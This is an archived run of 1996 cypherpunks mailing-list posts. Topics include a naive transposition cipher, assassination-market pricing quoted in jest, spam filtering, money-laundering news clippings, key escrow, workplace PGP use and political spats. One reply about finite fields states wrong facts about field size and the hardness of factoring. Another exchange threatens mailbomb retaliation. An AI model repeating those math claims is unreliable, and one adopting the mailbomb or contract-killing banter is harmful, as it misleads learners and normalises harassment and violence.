Message-ID: <9609180005.AA14720@ns.tsinet.com>

all,

i've been on cypherpunks for about a year and a half now, and have watched many interesting threads pass by but i've never posited anything. what has brought me out into the open is this :

i work for an engineering firm doing asic design, i use pgp ( as do all rational persons ), a co-worker here has come up with a 'cypher' scheme that he would like to use to send code to our clients.

the scheme is this : he would take the file of code and pad all lines to the length of the longest line, he would then perform column swaps, and then row swaps, to 'mix up' the file. the person receiving the file would then perform the opposite functions to recover the file.

it seems so simple that it can't be good. i've convinced him to use pgp, but i would like some input if possible on why his cypher scheme is not a good one.

thanx

-stuart

Packet Engines - The Industry leader in Gigabit ethernet
| "all sufficiently advanced           || Stuart Johnson
| technologies are indistinguishable  || Lead Asic Engineer
| from magic,"                        || Packet Engines Inc.
|       --Arthur C. Clarke            || sjohnson at packetengines.com

From vznuri at netcom.com Tue Sep 17 22:51:03 1996
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Wed, 18 Sep 1996 13:51:03 +0800
Subject: timmy waxes a widdle on AP
In-Reply-To:
Message-ID: <199609180311.UAA24662@netcom15.netcom.com>

>(Hint: One reason I seldom discuss AP is that to me it's just a special
>case of the larger issue of untraceable markets for such acts, something
>I've been worried about for almost a decade now. There is little reason to
>engage in the fiction of a "betting pool" when a hit may be untraceably
>contracted for and the standard fee ($1000 or less in some inner cities,
>$5000 for ordinary suburbanites, $30,000 or more for high-profile
>cases...so I hear) be paid with untraceable cash...as soon as truly
>untraceable digital cash becomes a reality.)

I always thought you hated to discuss AP because you didn't want to appear overly knowledgeable on the subject.. heh heh

hmmm, interesting points. sounds like a *lucrative* business. perhaps even some major *investment*opportunities* involved, eh!!!

but I'm still a bit confused about those prices. what determines them, anyway? risk to the assassin? it seems that it ought to be as easy to snuff out one person as it would another. e.g. everybody walks alone out at night at different times, it seems.
perhaps we have some assassins that are offering some kind of "value added" services to justify the difference in pricings. otherwise, it would seem to be a scam just like IBM did with one of their printers-- have a version that has a "slowdown chip" in it and charge less for that one. charging what the market will bear regardless of cost so to speak... since you are so open to discussion of the subject, would you care to speculate on the cost of, say, a person who has a large stock portfolio? or how about a cyberspace crackpot? I guess the latter would go for something like $100 on your sliding scale and the former for 100K+, maybe? do you have to pay different amounts of money whether you want a special kind of arrangement like a slow, agonizing demise? does that cost more or less than the quick and deadly type? I must admit I'm new to the concept and could definitely use some input from someone with some obvious knowledge on the subject such as yourself. I do rather like Jim Bell's ideas of pools however. maybe not have a betting pool, but just a pool of contributions from multiple "donors". do you think that idea has no merit? it seems like there ought to be all kinds of uplifting applications of that arrangement, hmmmm? so who are your "sources" for those estimates, anyway, timmy? hee, hee. be vewry carefwul!!! we're hunting wabbits!!!! From shamrock at netcom.com Tue Sep 17 22:51:19 1996 From: shamrock at netcom.com (Lucky Green) Date: Wed, 18 Sep 1996 13:51:19 +0800 Subject: RSA chip spec dist. paused until tomorrow Message-ID: Due to the overwhelming number of requests for the new RSA chip data sheets, I am moving from a fax to a web distribution. A fellow CP is currently scanning in the 28 page specs. We will post the URL tomorrow. If the chip and the RSA/DES ISA board (using the chip) currently in my possession work as well as I hope they do, either the company I work for or I will most likely distribute them. 
I have not yet received a request for the one loaner chip. Are there no hardware-hacking CPs in the SF Bay Area? That seems hard to believe. --Lucky From null at void.gov Tue Sep 17 23:07:48 1996 From: null at void.gov (#6) Date: Wed, 18 Sep 1996 14:07:48 +0800 Subject: Anthrax on the 'net [skating rinks to be outlawed] In-Reply-To: <9609172114.AA26321@outland> Message-ID: <323F6EF2.5B23@void.gov> Two teens reported being propositioned, outside the neighborhood skating rink, to participate in the making of some kiddie porn. They called police who made some arrests (I think). The city council is considering legislation to outlaw skating rinks. From dlv at bwalk.dm.com Tue Sep 17 23:09:43 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 14:09:43 +0800 Subject: Dealing with junk mail In-Reply-To: <01I9L7W8DYNA8ZO0TR@delphi.com> Message-ID: <8HHFuD94w165w@bwalk.dm.com> JMKELSEY at delphi.com writes: > I just don't think > I'd like Delphi to start filtering my e-mail without asking me for > permission and instructions first.) Likewise a number of AOL users don't like the idea of AOL deciding what they can and can't read. (By the way one of the good things about AOL is that they ignore all Usenet cancels.) AOL is promising to let its users filter their incoming mail the way they want to by the end of September. > Each user has a mail filter with a set of rules written either by or > for that user. The mail filter does one of four things with each > piece of e-mail it receives: > > a. It lets the e-mail through immediately. (E-mail from friends, > employers, employees, family members, etc. would probably be in this > category.) This should not be the default. > b. It discards the e-mail immediately. (E-mail from people you > really didn't like, and from people who have spammed you in the past > would probably be in this category.) Or may from mailing lists submitted by known idiots. > c. It puts the e-mail on hold in some storage area. 
This should be the default for unknown senders.

> d.   Send e-mail back to the sender, informing him of conditions
> under which the user is willing to accept this e-mail.  This
> might be things like requiring anonymous users to provide some
> minimal kind of identity, or telling senders ``I'll read your
> e-mail for one dollar in digicash,'' or ``I'll read your e-mail
> if you carry out this computationally expensive calculation, or
> some other thing.
>
> For e-mail in the third category, some kind of summary report is
> sometimes generated, to be sent to a server.  The server collects
> these reports, and uses some kind of system (maybe rule-based, but
> probably involving scores to estimate probability of spam or other
> unwanted e-mail) to determine what is and is not spam, and with what
> probability.  It then sends to each of its subscribers, every day or
> so, a report indicating scores for users' messages.  (These should
> be individualized.)

One can simply choose to read the a) mail now and c) mail later. Consider this scenario:

10:00 Eve sends junk e-mail to Alice and Bob.
10:05 Alice reads her urgent e-mail; leaves non-urgent e-mail for later.
10:30 Alice reads non-urgent e-mail, discovers junk mail from Eve.
10:31 Alice posts a warning to a Usenet newsgroup about junk e-mail from Eve, specifying a pattern that matches Eve's junk mail, and perhaps an address for postmaster complaints.
10:40 Bob starts reading his e-mail. Before he begins, his e-mail reading program fetches new e-mail notices from the usenet newsgroup, finds the ones from the issuers Bob trusts, checks their PGP signatures, and adds their patterns to its database. It then junks Eve's letter (discards it or bounces it to the postmaster, whatever Bob chooses)

Note that procmail can't do it - procmail would get Eve's junk mail at 10:00. We want to delay the processing of the incoming queue to get the latest available junk mail notices.
> The junk e-mailers can try various countermeasures to this.  The
> most obvious are:
>
> a.   Try to hit people who aren't using a good junk-mail filter.
> b.   Try to make it against the law to use a junk-mail filter.
> (Perhaps this would be the case only for PSA spams?)

It's probably a bad idea for an ISP to impose such filters on users without letting them "opt out", as AOL tried to do.

> c.   Try to disguise their e-mail to make it not obviously junk
> e-mail, and simultaneously to alter each message to avoid
> detection by the servers, by making changes to each message,
> timestamp, and claimed sender ID.

That would be an interesting technical challenge.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From dlv at bwalk.dm.com Tue Sep 17 23:10:50 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 14:10:50 +0800
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <3kJFuD96w165w@bwalk.dm.com>

Money Laundering Alert: August 1996

'Unauthorized' Banks Pose Laundering Threat

They are subject to none of the recordkeeping or reporting requirements of the Bank Secrecy Act, receive no examinations from any banking regulator, and may be on your bank's currency transaction reporting exemption list.

The Office of the Comptroller of the Currency refers to them as "entities that may be conducting banking operations in the U.S. without a license." Money launderers probably refer to them as dreams come true and, unless legitimate financial institutions are alert, can use them to place illicit proceeds into the financial system.

They are "unauthorized" banks, and for the past five years the OCC has been disseminating advisories to legitimate U.S. banks - but not to consumers - in an effort to expose their existence and halt their illegal operations.

These so-called "banks" offer a variety of banking services, often at lower fees and better interest rates than legitimate banks offer.
What makes them different from a legitimate bank - and attractive to money launderers -- is that they are not licensed by any U.S. banking agency and thus do not have to meet regulatory standards. Because the OCC and other federal bank regulators are not investigative agencies, they can do little more than report these institutions to those who are. If the entities are found to be operating a bank without a license they can be prosecuted under the Glass-Steagell Act (Title 12, USC Sec. 378(a)(2)). Such prosecutions are rare. In one case in 1994, initiated by Federal Reserve Board examiners, the principals of Lombard Bank, Ltd., were charged with operating an unauthorized bank through a payable-through account at American Express Bank International in Miami. Lombard, which had been "licensed" in the South Pacific money laundering haven of Vanuatu, offered its Central American customers virtually full banking services in the U.S. through its PTA (MLA, Sep. 1994). Earlier this year, the OCC released a list of more than 50 "banks" known to be operating without authorization. OCC officials say the number grows steadily. Some of the "banks" say they are licensed by foreign countries or U.S. states to conduct banking business. Others, such as the Swiss Trade & Commerce Trust, Ltd., of Belize, continue to offer services in the U.S. despite edicts from foreign banking authorities to cease doing business. The unauthorized entities have a common trait. They usually have names that are similar to those of well-known legitimate institutions. The OCC list includes the Bank of England, a Washington, D.C., entity not associated with London's famous "old lady on Threadneedle Street" and Citicorp Financial Services, a Beverly Hills firm not associated with the better-known institution of that name. It also includes the First Bank of Internet, which heralds itself as the first bank in cyberspace. 
Through its periodic "special alerts," the OCC warns banks to "view with extreme caution any proposed transaction involving any of the listed entities." It makes no effort to educate members of the general public who unknowingly place their money and trust in those uninsured institutions. American Banker: Friday, August 30, 1996 Swift Near Alliance in Trade Document Automation By STEVEN MARJANOVIC Swift, the international banking telecommunications network, wants to play a bigger role in trade finance and the exchange of related documentation. Sources said the Brussels-based organization will soon take a position-- perhaps as early as its September board meeting-- on whether to work on trade automation in cooperation with another consortium, called Bolero. Such a move would involve an increase in nonbank participants on a bank-owned network that has approached such liberalization cautiously. Swift, formally the Society for Worldwide Interbank Financial Telecommunication, is used by 5,300 banks for exchanging messages in such areas as funds transfer, foreign exchange, and securities. The network averaged about 2.7 million messages a day in July, representing daily dollar volumes exceeding $2 trillion. Officials said Swift is nearing a decision to work with the Bolero Association, which is forming an electronic registry for the so-called "dematerializing" of trade documents. Swift could provide the "platform" for allowing banks and corporations to exchange such documentation as letters of credit and bills of lading. Bolero was formed in 1994 with funding from the European Commission, but has not formulated concrete operating plans. Its members include Citicorp, Barclays Bank PLC, and other multinational banks and corporations. Peter Scott, trade services market director at Swift, said it has been in discussions with London-based Bolero since December 1995 about joining forces to automate the exchange of trade documents. 
"Bankers are beginning to sense both the opportunities in those areas and the threats to them from an intermediary stepping in and potentially taking away the business," Mr. Scott said. Trade-document capability "is not a heavily utilized area within Swift at the present time," he said. The potential in automation is obvious to Bolero officials. At the New York Banktrade Conference recently, John McKessy, the association's North American representative, said the annual value of goods moved internationally approaches $4 trillion. He estimated current international trade requires some three billion documents to be issued and managed. The cost of dealing with paper alone eats up about 7% of the total value of those goods, as much as $280 billion, Mr. McKessy said. Bank revenues from issuing letters of credit last year were just over $1 billion, according to a soon-to-be-released survey by the U.S. Council on International Banking. Anthony K. Brown, senior vice president of trade services at MTB Bank, described trade transaction processing as "extremely cumbersome and tedious, prone to mistakes and delays (that) can be a hindrance to the completion of a transaction." MTB is a $400 million-asset merchant bank based in New York. About 80% of its $100 million in loans are trade-related. The paper-shuffling costs are not borne entirely by banks. Import/export companies, insurers, freight forwarders, and various government inspection agencies are also involved. "The question is whether Swift wants to do it," said Dan Taylor, president of the New York-based U.S. Council. "Swift is going to act fairly quickly on this," he added. Mr. Taylor said Swift officials will likely grapple once again with the political and philosophical issues of giving nonbanks more access to Swift, and to payment systems generally. In 1995, the network granted partial access to nonbanks after years of heated debate. 
"You always have this push and pull, where some banks would like Swift to do certain things" while others want the network to focus on the money transfer business, Mr. Taylor said. "If Bolero succeeds and Swift joins, I think it will move fairly rapidly, but I'm not sure that Bolero is going to be the only thing out there." He said Bolero might evolve using value-added networks - or intranets - like the IBM Global Network and General Electric Information Services Co., or perhaps even the Internet. Indeed, another member of Bolero, CSI Complex Systems Inc., New York, is apparently talking to several providers of private, value-added networks and may soon enter a contract with one. CSI letter-of-credit software leads the pack in banking, with about a 16% market share, Mr. Taylor said. The company recently formed a business unit called Electronic Documents International, which has developed an Internet-based system for initiating letters of credit. CSI spokesman George Capsis said the software, Import.com, creates "about 30 key documents involved in international trade." The Internet, enhanced with security features, may help the trade industry reduce paper-related costs, especially at smaller companies overseas. CSI managing director Andre Cardinale said customers need only to "dial into a bank's Internet server, pull up the Import.com application, and actually fill in the details to create a new letter of credit or an amendment to an existing one." While Bolero may find a place on the Internet or a GE-type network, Mr. Cardinale said the ultimate push may yet come from the banking industry working collectively through Swift. He said Swift opposition from nonbank constituencies that are concerned the telecommunications cooperative will be more sympathetic to banks when disputes arise. But "if Swift does it," he added, "it will bring banks into the universe far more - pardon the pun - swiftly." 
Crain's New York Business: August 26, 1996 Bloomberg to Detail Growth of Information Empire Michael Bloomberg made a name for himself on Wall Street with his trading acumen and mastery of the computer systems that were becoming crucial to success in the securities business. But no one suspected when he left Salomon Brothers in 1981 that in the next decade he would build the fastest-growing provider of financial information in the world. Mr. Bloomberg, whose company Bloomberg Financial Markets has estimated sales of $600 million, will be the keynote speaker at the fifth annual Crain's ''Growing a Business Expo,'' to be held this year on Thursday, Oct. 24. The event will take place at the New York Hilton & Towers from 8 a.m. to 1 p.m. It is presented by Citibank and co-sponsored by Con Edison and Empire Blue Cross and Blue Shield. Last year, more than 1,000 growing business owners and managers attended the expo, which provides information for companies operating in the city regarding potential suppliers, financial resources and government programs. The cost to attend the event is $45 and includes a continental breakfast. Individuals registering before Sept. 6 can bring a colleague for free. To register, call Flagg Management at (212) 286-0333. In addition to Mr. Bloomberg's speech, attendees will be able to attend seminars on financing and other help available from the city, financing techniques, energy cost savings programs and how to reduce health insurance costs. An expected 135 exhibitors will be offering products and services of use to growing companies. Crain's New York Business editors will discuss how a growing business can get coverage in Crain's and in other publications. The heart of Mr. Bloomberg's empire is a news gathering operation that sends information through 62,000 computer terminals installed on the desks of investment professionals around the nation. His company provides the latest financial news and sophisticated tools to analyze information. 
The company he has built is noted for its lack of bureaucracy despite its growth to 2,000 employees. Its hallmarks are hands-on leadership and an entrepreneurial atmosphere where employees receive perks such as free food. Mr. Bloomberg has extended his reach to include an all-news radio station in New York, WBBR; Bloomberg Personal TV; syndicated television shows; a monthly personal finance magazine; and a similar magazine for institutional investors.

American Banker: Friday, September 6, 1996
America Online Opens a New Banking Channel
By DREW CLARK

Nineteen banks - national home banking stalwarts such as Citicorp and BankAmerica, plus a complement of less prominent regionals - have climbed onto the America Online bandwagon. Most already offer their customers several options for banking via personal computer and view America Online, with its six million subscribers, as a way to appeal to a broad cross-section of computer-literate consumers. Fourteen of the AOL banking partners will be delivering services through BankNow, a software package developed for the interactive network by Intuit Inc. The other five banks have opted to use their own software. One of them - Security First Network Bank, which operates entirely on the Internet - will invite AOL users in through their Web browsers. With its announcement this week, America Online Inc. takes its place among the many alternative "channels" for on-line banking. Many of the banks on AOL's list are simultaneously cooperating with other companies that are themselves competitors, such as Intuit and Microsoft Corp., suppliers of the Quicken and Money financial management software, respectively. Also crossing competitive lines, America Online said its subscribers will be able to bank from home with PC software from three suppliers other than Intuit: Checkfree Corp., Online Resources and Communications Corp., and Visa Interactive.
"Everyone understands that there is competition in the home banking arena," said David Baird, general manager of the personal finance division at America Online, based in Dulles, Va. "To align ourselves with exclusively one company would be a mistake." Intuit can count on 14 initial bank users of BankNow. Spokesmen for the other three system vendors declined to say when they expect to have home banking products available for the AOL channel. Experts noted that AOL and Intuit could be a strong tandem, in that they dominate their respective businesses. Intuit's Quicken is the leading brand in personal finance software. The company claims more than 9 million active users and a market share of about 80%. America Online's subscriber base of six million is as big as those of its next two competitors, Compuserve and Prodigy, combined. The financial institutions currently offering BankNow are: American Express, Bank of Stockton (Calif.), Centura Banks Inc., Commerce Bank of Kansas City, Mo., Commercial Federal of Omaha, Compass Bank of Alabama, CoreStates Financial Corp., Crestar Financial Corp., First Chicago NBD Corp., Laredo (Tex.) National Bank, M&T Bank of Western New York, Marquette Bank of Minneapolis, Sanwa Bank California, and Union Bank of California. More plan to offer BankNow-based services through AOL later this year: BankAtlantic of Florida, Bank of Boston, First Hawaiian Bank, First Michigan Bank, Mellon Bank, Signet Bank, and U.S. Bank of Oregon. Unlike Quicken, BankNow software is available free to America Online subscribers. Banks' fees will vary. First National Bank of Chicago said it will charge $3.95 a month for on-line banking and $9.95 a month for other services that include bill payment. Centura Banks Inc. said it will offer on-line banking free, and charge $5.95 a month for bill payment. Intuit officials declined to disclose what its Intuit Services Corp. processing unit will charge to handle these transactions for banks. 
Some of Intuit's larger bank partners chose not to offer BankNow because they already promote their own PC banking programs. For example, Citicorp, First Union, and Wells Fargo each support Quicken, but passed on BankNow. Instead, they are paying a premium for a "button" on America Online's banking screen that will eventually link users to a proprietary home banking program.

AP Online: Thursday, September 5, 1996
House Probes Money Laundering
By ROB WELLS

House Banking Committee members on Thursday urged a Treasury Department agency to step up its efforts to halt money laundering by Mexican drug lords. Rep. Spencer Bachus, R-Ala., urged the Financial Crimes Enforcement Network to put in place new regulations to plug a significant loophole that allows Mexico's drug dealers to place their ill-gotten profits back into the U.S. Bachus, chairman of the House Banking oversight subcommittee, said Congress gave authority to FinCen in 1994 to put in place new rules that would prevent drug dealers from using foreign bank drafts, a type of check, to evade currency reporting restrictions. ''That effort is long, long overdue,'' Bachus said. Rep. Henry Gonzalez, D-Texas, asked the agency to provide further details about suspected money laundering in his home town of San Antonio, particularly the source of a $3 billion cash surplus in the San Antonio Federal Reserve Bank. The issue arose as Bachus' panel began exploring the dramatic rise of narcotics traffic along the 2,000 mile long U.S.-Mexico border, and the ease with which drug dealers can ship their profits to the south. Money laundering refers to the practice by which drug dealers, mobsters and others funnel their illegal profits into the banking system through businesses or other means. Bachus said estimates of drug profits laundered through Mexico range from $6 billion to $30 billion per year. Stanley E.
Morris, FinCen's director, defended his agency's record, saying a combination of new rules and tougher enforcement in the past decade has ''made it more difficult to launder money in the U.S.'' and increased the costs of money laundering. Morris' agency enforces the Bank Secrecy Act, a key weapon against money laundering. As for the new rules aimed at foreign bank drafts, Morris said the regulations are more difficult than first expected because such restrictions also could hinder legitimate commerce. He said the proposal would be released soon. FinCen is working on other fronts to combat money laundering, which includes a new computer system that tallies bank fraud to help regulators gain an early warning of money laundering. In addition, the Clinton Administration assisted Mexico in adopting new anti-money laundering rules earlier this year. And Treasury Secretary Robert Rubin convened a conference of 29 nations in December 1995 to focus on the money laundering problem. One committee member, Rep. Maxine Waters, D-Calif., addressed the political context of the hearings. Waters said she was suspicious that the Republican-led Congress was holding ''a rash of hearings this month ... on the subject of drugs just as Presidential candidate Dole tries to use the issue as part of his campaign strategy against President Clinton.'' Waters said if the GOP-led House ''is truly serious about the impact of drugs'' it should hold hearings about charges raised in a San Jose Mercury News investigative series last month concerning the role CIA-backed rebels in Nicaragua played in bringing crack cocaine and weapons to Los Angeles and other cities. Bachus told Waters the hearing wasn't motivated by politics and that he had personally been involved in anti-drug efforts prior to his election to Congress. 
---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From vznuri at netcom.com Tue Sep 17 23:13:00 1996
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Wed, 18 Sep 1996 14:13:00 +0800
Subject: Diffie Hellman - logs in Galois fields
In-Reply-To: <842896368.27767.0@fatmans.demon.co.uk>
Message-ID: <199609180148.SAA28173@netcom3.netcom.com>

>A question for the mathematicians out there:

heh. I'll answer anyway.

>My maths tutor has told me a bit about the construction of Galois
>fields (If I`m correct the construction is Z mod N, N some integer,
>then a transformation F(x) on the residue classes already in the
>field) I know also the definition is that there are P**k elements, p
>a prime.

what is 'k'? there are N elements in the field as I understand the terminology.

>1. How can a field be finite, as by definition it has to be closed
>under addition, subtraction, multiplication and division???? (sorry
>if this one is a bit of a no brainer, maybe the definition is
>different but I can`t seem to see how)

the short answer is that all the operations are redefined somewhat to analogous operations that map into the range of integers. division is not defined for results that are not integers. actually division is replaced with an operation called "finding the inverse mod n".

>2. Why is taking logs in a finite field computationally hard? - Me
>and Alec (My maths tutor at college) guessed that it is because
>exponentiation and logs are each others inverse functions, and
>somehow this becomes a one way function in a finite field.

actually, this is a very important question that already gets to the limits of current knowledge. the short answer is that there is *no*proof* that this problem is "hard". in fact such proofs are somewhat rare and exist mostly for contrived problems.
in computational theory what one does is prove that your problem is at least as difficult as some other famous problem that many people have tried to find efficient solutions but have failed. this is called "NP Complete". as far as I know there is no proof that "taking logs in a finite field" is actually "hard". in fact there is no proof that factoring (an equivalent form of the problem) is "hard" or even a proof that it is np complete. most of this stuff is in the cryptography faq out there in cyberspace. I am writing in hopes that someone might amend the above by posting the latest academic thinking on the difficulty of factoring. From tcmay at got.net Tue Sep 17 23:24:34 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 14:24:34 +0800 Subject: The Near-Necessity of Health Insurance Message-ID: At 8:49 PM 9/17/96, Simon Spero wrote: >I wouldn't be so proud of the US health care system; the actual quality >of care is really pretty awful, even with insurance. Even though the >NAtional Health Service in the uK is woefully underfunded, I've always >had much better treatment than I have from HMOs here; even seeing a >specialist privately, at home, with no insurance, is cheaper than getting >an X-Ray looked at by someone who once met a radiologist a cocktail >party. ... >There are ideological reasons that argue for rejecting such >compulsory schemes based on that element of coercion; it's hard to >make the case against purely on efficiency grounds. Personally, I have not been a patient in a hospital in my entire adult life. Nor have I seen a doctor, except for a mandatory college physical in 1970 and an insurance company physical in 1977. I just haven't broken any bones, had any serious illnesses, or felt the need to visit a doctor, an emergency room, or a walk-in clinic of any sort. I suppose I've been lucky. Also, I dislike hospitals and avoid doctors unless there seems to be a compelling need. So far, there has not been. 
And, no, I don't have any health insurance of any kind. However, I am thinking about getting some. Not so much because I'm getting older, but because I fear a new phenomenon: hospital emergency rooms refusing admittance of patients unless they can present the proper patient-unit ID card (showing one is enrolled in Blue Shield, Blue Cross, Kaiser, or whatever). My dentist's receptionist/bill handler already seems flustered that I am paying my dental bills with a check, rather than giving her my insurer's account number. I also learned from a "60 Minutes" report, since confirmed elsewhere, that large hospitals routinely negotiate large discounts with large insurers, e.g., Blue Shield, so that while the "list price" of a typical day in a hospital may be an exorbitant $1800 a day ($30 for an aspirin, $75 for the lights-out bed check, etc...it all adds up!), Blue Shield has negotiated a fee of less than a third of that.... In other words, the person who insures himself (through savings and investments) and who offers to pay for treatment out of his own funds, may be at a serious disadvantage. He pays the inflated rates for services, and may face delays in being admitted to a hospital. (This space reserved for Duncan and others to explain how one can offer to pay in Krugerrands and to negotiate with the hospital on the spot. Meaning no disrespect to Duncan, but I doubt it is this easy. The mind-set of hospitals seems to be that anyone without a valid patient-unit card is obviously a derelict and indigent. And while all hospitals are required to accept derelicts and indigents in suitable emergencies--not a law I agree with--it is not desirable that one be treated as a derelict and undesirable. I hope I am conscious enough to give the admitting staff my financial health information.) Anyway, I'm thinking of finally bowing to the inevitable and starting to fork out $200-300 a month for health care I am unlikely to routinely use. 
(Obviously the folks who use their insurance routinely, as one of my engineers once used to do (he'd take his kids to the hospital every time they sneezed), are being subsidized by those of us who avoid hospitals at all costs.) I'm not arguing for national health care, just noting that we effectively are getting it, between the "Poor People" having subsidized care and the "Rest of Us" in employer-funded or private health care plans. Cash is already dead at most hospitals.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From vznuri at netcom.com Tue Sep 17 23:32:42 1996
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Wed, 18 Sep 1996 14:32:42 +0800
Subject: The GAK Momentum is Building...
In-Reply-To:
Message-ID: <199609180201.TAA29368@netcom3.netcom.com>

again, more black/white cpunk thought that goes along the lines, "unless we have won everything, we have lost everything". you guys are awfully cynical. clipper has failed its original objectives by miles. the last-ditch efforts by bureaucrats to get some semblance of "key escrow" from recent developments are increasingly pathetic. I'd say the significant dilution of clipper over the years is a very strong victory for pro-privacy, pro-cryptography advocates. the Clipper proposals are increasingly moving into the area of "key management". large companies will always want key management features, to deal with employees who forget passwords, leave the company, etc.-- face it, this is a simple reality.
essentially all the latest moves amount to, imho, is the government trying to get its fingers into these key management infrastructures. so the recent stuff that is emerging, I would hesitate to call "gak". it sounds more like "gaki", or government access to key infrastructures. these infrastructures are going to be built up regardless of what cpunks wish-- private businesses simply must have them. frankly all it looks like to me is the government saying, "we reserve the right to subpoena keys". this will always be the case. bureaucrats are always trying to pass new laws when old ones already apply.

>It is a done deal,
>--Lucky, who told you this three years ago.

again, more simplistic summaries. there is a whole range of evil proposals that the government could be involved in, and we have to begin to discriminate between them. the government could be the sole manager of all key infrastructures and the entity that licenses all crypto for any use-- that I would consider total worst case reality. or the government could have tentacles stuck into key infrastructures that businesses build up. the latter is not quite as odious or threatening. in fact it simply sounds like the government saying, "we reserve the right to subpoena keys". (of course the latter could always evolve into the former. I suppose the cynics would contend that it is inevitable.)

From osborne at gateway.grumman.com Tue Sep 17 23:37:44 1996
From: osborne at gateway.grumman.com (Rick Osborne)
Date: Wed, 18 Sep 1996 14:37:44 +0800
Subject: PGP in the workplace
Message-ID: <3.0b16.32.19960917232055.005410c0@gateway.grumman.com>

Here's one I figure you all would just love:

Yesterday afternoon, I was told by some higher-level associates of mine (not Management level, mind you, just people higher on the food chain) that my use of PGP in the corporate environment was not appreciated and could result in my being looked upon *very* unfavorably by the managerial crowd.
Without even delving into security reasons, I politely explained to them that due to my job (which has several crypto-related applications) I needed PGP to communicate with people and list-bots in the outside world (or they could gladly pay for my formal training). They just shook their heads and said "be careful, you've been noticed".

I was then told to stop 'messing around' in my shell account. I asked what was meant by this, and apparently it had been noticed that I had done a few things, which I had done to simply check the security of my account, which could be viewed as 'inappropriate'. You know what they were?

1. I checked to see if the passwd file was available to anyone (was it shadowed, etc.). This was seen as an attempt to GET the passwd file, and thereby have access to sensitive data.

2. I change my password regularly (once a week). Now this may seem excessive (it apparently did to them), but you must understand that the entire IS department is extremely buddy-buddy here. Over half of the users have root passwords on any given system. I don't feel like sharing, horrible me. I guess my regular changing of passwords was seen as a strain on the system (ha!), as they didn't elaborate *why* I had been flagged for this.

Upon explaining to them that I was simply trying to make sure of my own security, I was told that I was to just assume that I was secure, and that *any* 'poking around' was found to be "highly aggravating" and could only "exacerbate the situation further." Luckily, I had to get to class, so I cut the conversation before it could get any more out of control.

Now, seeing as I'm fairly new to the Corporate world, but is this something common? I know when I was at college, poking around was expected and encouraged, as it helped find and plug holes in the system. But this is almost like some kind of protection racket here!
____________________________________________________________
Rick Osborne osborne at gateway.grumman.com
"Yes, evil comes in many forms, whether it be a man-eating cow or Joseph Stalin, but you can't let the package hide the pudding! Evil is just plain bad! You don't cotton to it. You gotta smack it in the nose with the rolled-up newspaper of goodness! Bad dog! Bad dog!" - The Tick

From dlv at bwalk.dm.com Tue Sep 17 23:37:50 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 14:37:50 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To:
Message-ID:

"Z.B." writes:

> On Mon, 16 Sep 1996 paul at fatmans.demon.co.uk wrote: > > > > > > > The Vilus bot is at it again, I suggest a 2 line cypherpunks FAQ > > along the following lines: > > > > Q> What do it do when I join the list? > > A> Killfile *@bwalk.dm.net > > > How about we go just a little farther than that and set up Procmail to > bounce all of his messages back to him? I'd hate to see his inbox if > enough of us started doing that! > > > > > > Datacomms Technologies web authoring and data security > > Paul Bradley, Paul at fatmans.demon.co.uk > > Http://www.fatmans.demon.co.uk/crypt/ > > "Don`t forget to mount a scratch monkey" > > > > --- > > Zach Babayco > > zachb at netcom.com <----- finger for PGP public key > http://www.geocities.com/SiliconValley/Park/4127 > >

Yeah!!! And I'll bounce each mailbomb to everyone who tries it. Won't that be fun. Too bad your netcom account won't last long.

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From tob at world.std.com Tue Sep 17 23:38:36 1996
From: tob at world.std.com (Tom Breton)
Date: Wed, 18 Sep 1996 14:38:36 +0800
Subject: Workers Paradise. /Political rant.
Message-ID: <199609180100.AA07744@world.std.com>

jbugden at smtplink.alis.ca writes:

> I don't think that a reasonable person would argue that medical
> insurance should be outlawed because everyone should take care of their
> own needs. A social safety net is simply a form of health and life
> insurance. Statistical arbitrage if you will. By spreading the risk you
> minimize the cost. Yes, some people will take advantage of the system.
> But like a virus, a robust system should be able to withstand this form
> of attack.

It's too bad you received such fingers-in-the-ears libertarian-scream responses to this. You deserved a better answer than that. Not that I entirely agree. Let me quote part of something I once wrote on essentially this topic:

"With *real* insurance it's tough enough to root out fraud. How can an unwritten, virtual policy, knowable only through deduction, addressing our entire circumstances of birth, that the insured may deny contracting to or may disagree about what the terms were, be easy to sort out?"

Tom

From declan at eff.org Tue Sep 17 23:53:12 1996
From: declan at eff.org (Declan McCullagh)
Date: Wed, 18 Sep 1996 14:53:12 +0800
Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant
In-Reply-To: <199609171531.BAA22478@suburbia.net>
Message-ID:

Clearly, we must have only professional political views here.

-Declan

On Wed, 18 Sep 1996, Julian Assange wrote:

> > And what am I paying for...to protect the status quo. I believe that
> > there is more than enough help for ppl available. They just need to
> > get off their butts and work.
>
> Do we really need your amateur political views?
>
> --
> "Of all tyrannies a tyranny sincerely exercised for the good of its victims
> may be the most oppressive.
It may be better to live under robber barons
> than under omnipotent moral busybodies, The robber baron's cruelty may
> sometimes sleep, his cupidity may at some point be satiated; but those who
> torment us for own good will torment us without end, for they do so with
> the approval of their own conscience." - C.S. Lewis, _God in the Dock_
> +---------------------+--------------------+----------------------------------+
